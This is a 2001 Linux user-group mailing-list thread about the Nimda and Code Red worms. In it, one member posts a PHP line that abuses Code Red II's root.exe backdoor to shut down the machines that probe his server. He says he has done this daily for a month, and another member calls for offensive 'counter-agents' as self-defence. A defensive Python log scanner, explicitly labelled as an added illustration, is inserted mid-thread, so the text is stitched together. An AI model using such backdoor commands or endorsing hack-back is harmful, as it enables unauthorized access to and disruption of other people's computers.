[NTLUG:Discuss] New IIS Virus

Paul Ingendorf pauldy at wantek.net
Wed Sep 19 07:46:52 CDT 2001


I have custom error logs set up and I use PHP files.  In these PHP files I check if the request URL is the default.ida etc.  If it is I use the old fopen command to send a GET request like so.

fopen("http://" . $REMOTE_ADDR . "/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");

This basically shuts the machine down via the backdoor Code Red II installs.  I think I have posted the code in here before.  If you would like I can forward it to you.

-- 
-->> mailto:pauldy at wantek.net
-->> http://www.wantek.net/
Running ....... Cos anything else would be a waste...
`:::'                  .......  ......
 :::  *                  `::.    ::'
 ::: .::  .:.::.  .:: .::  `::. :'
 :::  ::   ::  ::  ::  ::    :::.
 ::: .::. .::  ::.  `::::. .:'  ::.
.:::.....................::'   .::::..
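As an added illustration (not code from the original post or from anyone on the list), here is a defender-side alternative to the counter-script described above: a small Python scanner that flags the worm probe URIs in a web server access log and totals them per source address, so an admin can notify the owner of that address space instead of reaching back to the remote machine. The signature strings default.ida and root.exe come from the thread; cmd.exe is the other well-known IIS path these worms probe. The log format (Apache/NCSA combined), the sample lines and the reporting threshold are assumptions.

```python
"""Flag Code Red / Nimda style probe requests in a web access log and
summarise them per source IP.  Added example, not from the NTLUG thread.

Assumptions: Apache/NCSA combined log format; the sample lines below are
constructed; the threshold for reporting a source is arbitrary.
"""
import re
from collections import Counter, defaultdict

# Constructed sample log lines (not taken from anyone's real logs).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2001:07:01:12 -0500] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 288 "-" "-"
10.0.0.5 - - [19/Sep/2001:07:01:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
10.0.0.9 - - [19/Sep/2001:07:02:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
192.0.2.17 - - [19/Sep/2001:07:03:01 -0500] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
10.0.0.9 - - [19/Sep/2001:07:03:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
"""

# Minimal NCSA combined parser: client IP, timestamp, method, URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# (substring of the lower-cased URI, label).  Checked in order; first hit wins.
SIGNATURES = (
    ("default.ida", "code-red-overflow-probe"),   # Code Red / Code Red II
    ("/root.exe", "root.exe-backdoor-probe"),      # backdoor left by Code Red II
    ("cmd.exe", "cmd.exe-probe"),                  # Nimda and assorted scanners
)


def classify_uri(uri):
    """Return a signature label for a worm-like request URI, else None."""
    lowered = uri.lower()
    for needle, label in SIGNATURES:
        if needle in lowered:
            return label
    return None


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def scan_log(text):
    """Map source IP -> Counter(label -> count), covering probe requests only.
    Unparseable lines are skipped rather than crashing the scan."""
    hits = defaultdict(Counter)
    for line in text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        label = classify_uri(record["uri"])
        if label:
            hits[record["ip"]][label] += 1
    return hits


def summarise(hits, threshold=2):
    """Return [(ip, total_probes)] for sources at or above the threshold,
    busiest first (ties broken by address), ready for an abuse notification."""
    totals = [(ip, sum(counter.values())) for ip, counter in hits.items()]
    return sorted((t for t in totals if t[1] >= threshold),
                  key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    probes = scan_log(SAMPLE_LOG)
    for ip, total in summarise(probes):
        print(f"{ip}: {total} probe(s) -> {dict(probes[ip])}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; the per-IP breakdown is what you would attach to a note to the owning network's abuse contact.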


-----Original Message-----
From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
Of Daniel Hauck
Sent: Wednesday, September 19, 2001 7:20 AM
To: discuss at ntlug.org
Subject: Re: [NTLUG:Discuss] New IIS Virus


How about threatening the virus-spreading server owners with legal action?

Which/what script do you use to shut them down?

----- Original Message -----
From: "Paul Ingendorf" <pauldy at wantek.net>
To: <discuss at ntlug.org>
Sent: Wednesday, September 19, 2001 7:04 AM
Subject: RE: [NTLUG:Discuss] New IIS Virus


> I can attest that approximately 20% of what is in my log files are actual
> webservers and not just your average joe running iis at home.  Of course
> people on different subnets' mileage may vary.  Which is something that gets
> my goat because I know competent admins who are out of work right now and
> many of the servers hitting me now are the ones I've been e-mailing for
> about a month and some change now about fixing their servers on Code Red.
> Plus my script has been shutting most of their machines down daily for the
> past month and they still don't get the hint.  Oh well I'll be writing a
> counter script soon much like the last one probably just to shut their
> machine down once I figure out how this thing works and if that will be
> sufficient.
>
> --
> -->> mailto:pauldy at wantek.net
> -->> http://www.wantek.net/
> Running ....... Cos anything else would be a waste...
> `:::'                  .......  ......
>  :::  *                  `::.    ::'
>  ::: .::  .:.::.  .:: .::  `::. :'
>  :::  ::   ::  ::  ::  ::    :::.
>  ::: .::. .::  ::.  `::::. .:'  ::.
> .:::.....................::'   .::::..
>
>
> -----Original Message-----
> From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
> Of Daniel Hauck
> Sent: Wednesday, September 19, 2001 6:37 AM
> To: discuss at ntlug.org
> Subject: Re: [NTLUG:Discuss] New IIS Virus
>
>
> Your statement is incomplete and/or inaccurate.  A majority of what I have
> seen are home users... users (not administrators) at home.  Microsoft has
> unleashed too much power to the every-day user.
>
> I know we have had this discussion before, so please restrain yourself
> better than I am, but I still hold that Microsoft should bear some
> responsibility over this.  There are thousands of Windows machines out there
> running IIS and the owner/user doesn't even know about it.  It's sad.
>
> I would like to open up discussion about implementing "counter-agents."
> Clearly, there is little to no risk of prosecution and I think
> "self-defence" is a valid argument.  I'd be happy to host counter-offensive
> software on my server while I still have port 80 access.
>
> ----- Original Message -----
> From: "Aaron Goldblatt" <aaron at goldblatt.net>
> To: <discuss at ntlug.org>
> Sent: Wednesday, September 19, 2001 6:26 AM
> Subject: Re: [NTLUG:Discuss] New IIS Virus
>
>
> > > Has anyone been getting hits on their machines from this new virus? I
> >
> > I'll leave others to answer your direct question, but I'll observe that this
> > Nimda thing is harder on non-IIS servers than previous viruses.  Stuff like
> > Code Red produced a few dozen log entries a day.  This is producing thousands
> > of lines a day.  Nobody except viruses hit my web server anyway, so the
> > effect is minimal, but I do use the machine for other things, in addition to
> > just being my web server.
> >
> > It isn't Windows administration or even Windows administrators that bother me
> > so much as stupid Windows administration, and stupid Windows administrators.
> > Inattentive == stupid.
> >
> > ag
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >